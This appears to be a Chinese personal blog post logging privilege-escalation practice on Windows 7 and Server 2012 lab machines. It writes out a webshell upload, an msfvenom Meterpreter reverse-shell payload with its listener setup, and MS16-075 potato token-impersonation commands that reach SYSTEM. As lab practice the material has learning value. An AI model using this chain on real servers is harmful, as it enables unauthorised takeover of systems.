2019-12-10:win7,win12提权练习

一、win7

1,上传webshell到服务器,访问

 2019-12-10:win7,win12提权练习

2,因为win7权限没设置好,导致任何命令都可以执行

2019-12-10:win7,win12提权练习

 

 2019-12-10:win7,win12提权练习

直接提权成功,还可以通过msf工具利用exp进行提权,今天太晚了就先不做了

二、win2012

1,将写好的大马放到web服务器上

 2019-12-10:win7,win12提权练习

2,测试机进行访问大马,执行whoami执行成功,是iis服务账户

 2019-12-10:win7,win12提权练习

3,执行systeminfo获取服务器系统补丁信息

 2019-12-10:win7,win12提权练习

4,尝试net user 可以查看到用户,使用net user /add没有成功

 2019-12-10:win7,win12提权练习

6,上传使用测试脚本可读写目录脚本,测试出可读写的目录

 2019-12-10:win7,win12提权练习

7,使用msfvenom生成的后门监听端口

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.190.158 lport=1234 -f exe -o ./hack.exe 生成后门程序,进行上传

 2019-12-10:win7,win12提权练习

执行监听

1)use exploit/multi/handler

2)set PAYLOAD windows/meterpreter/reverse_tcp

3)set LHOST 192.168.190.158 set

4)LPORT 1234

5)exploit

 2019-12-10:win7,win12提权练习

在提权目标服务器上执行hack.exe程序

 2019-12-10:win7,win12提权练习

8,成功接收到session

 2019-12-10:win7,win12提权练习

9,利用msf16-075进行提权,依次执行以下命令

use incognito

list_tokens -u

execute -cH -f ./potato.exe

 2019-12-10:win7,win12提权练习

10,提升权限,

执行ms16-075提权程序后,再次执行以下命令,获取当前用户权限为NT AUTHORITYSYSTEM权限。

list_tokens -u

impersonate_token "NT AUTHORITYSYSTEM"

getuid

2019-12-10:win7,win12提权练习

提权成功

2019-12-10:win7,win12提权练习

 

 完

2019-12-10:win7,win12提权练习

上一篇:C# 知识巩固三


下一篇:win10系统易升更新不成功c盘也满了,解决方法